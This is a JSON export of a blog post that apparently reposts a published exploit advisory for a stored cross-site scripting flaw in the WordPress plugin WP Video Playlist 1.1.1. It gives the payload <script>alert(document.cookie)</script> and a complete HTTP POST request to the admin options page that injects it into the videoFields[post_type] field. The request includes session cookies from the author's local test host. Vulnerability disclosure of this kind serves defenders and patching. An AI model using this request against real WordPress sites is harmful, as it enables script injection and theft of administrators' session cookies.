{"id":56263,"date":"2024-04-15T21:19:42","date_gmt":"2024-04-15T17:19:42","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178061\/wpvideoplaylist111-xss.txt"},"modified":"2024-04-15T21:19:42","modified_gmt":"2024-04-15T17:19:42","slug":"wordpress-wp-video-playlist-1-1-1-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-wp-video-playlist-1-1-1-cross-site-scripting\/","title":{"rendered":"WordPress WP Video Playlist 1.1.1 Cross Site Scripting"},"content":{"rendered":"<p># Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 &#8211; Stored Cross-Site Scripting (XSS)<br \/># Date: 12 April 2024<br \/># Exploit Author: Erdemstar<br \/># Vendor: https:\/\/wordpress.com\/<br \/># Version: 1.1.1<\/p>\n<p># Proof Of Concept:<br \/>1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named &#8220;videoFields[post_type]&#8221;.<\/p>\n<p># PoC Video: https:\/\/www.youtube.com\/watch?v=05dM91FiG9w<br \/># Vulnerable Property at Request: videoFields[post_type]# Payload: &lt;script&gt;alert(document.cookie)&lt;\/script&gt;<br \/># Request:<br \/>POST \/wp-admin\/options.php HTTP\/2<br \/>Host: erdemstar.local<br \/>Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9<br \/>Content-Length: 395<br \/>Cache-Control: max-age=0<br \/>Sec-Ch-Ua: &#8220;Not(A:Brand&#8221;;v=&#8221;24&#8243;, &#8220;Chromium&#8221;;v=&#8221;122&#8243;<br \/>Sec-Ch-Ua-Mobile: ?0<br \/>Sec-Ch-Ua-Platform: &#8220;macOS&#8221;<br \/>Upgrade-Insecure-Requests: 1<br \/>Origin: https:\/\/erdemstar.local<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/122.0.6261.112 Safari\/537.36<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7<br \/>Sec-Fetch-Site: same-origin<br \/>Sec-Fetch-Mode: navigate<br \/>Sec-Fetch-User: ?1<br \/>Sec-Fetch-Dest: document<br \/>Referer: https:\/\/erdemstar.local\/wp-admin\/admin.php?page=video_manager<br \/>Accept-Encoding: gzip, deflate, br<br \/>Accept-Language: en-US,en;q=0.9<br \/>Priority: u=0, i<\/p>\n<p>option_page=mediaManagerCPT&amp;action=update&amp;_wpnonce=29af746404&amp;_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&amp;videoFields%5BmeidaId%5D=1&amp;videoFields%5Bpost_type%5D=&lt;script&gt;alert(document.cookie)&lt;\/script&gt;&amp;videoFields%5BmediaUri%5D=dummy&amp;videoFields%5BoptionName%5D=videoFields&amp;videoFields%5BoptionType%5D=add&amp;submit=Save+Changes<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 &#8211; Stored Cross-Site Scripting (XSS)# Date: 12 April 2024# Exploit Author: Erdemstar# Vendor: https:\/\/wordpress.com\/# Version: 1.1.1 # Proof Of Concept:1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named &#8220;videoFields[post_type]&#8221;. # PoC Video: https:\/\/www.youtube.com\/watch?v=05dM91FiG9w# &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56263","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56263"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56263\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}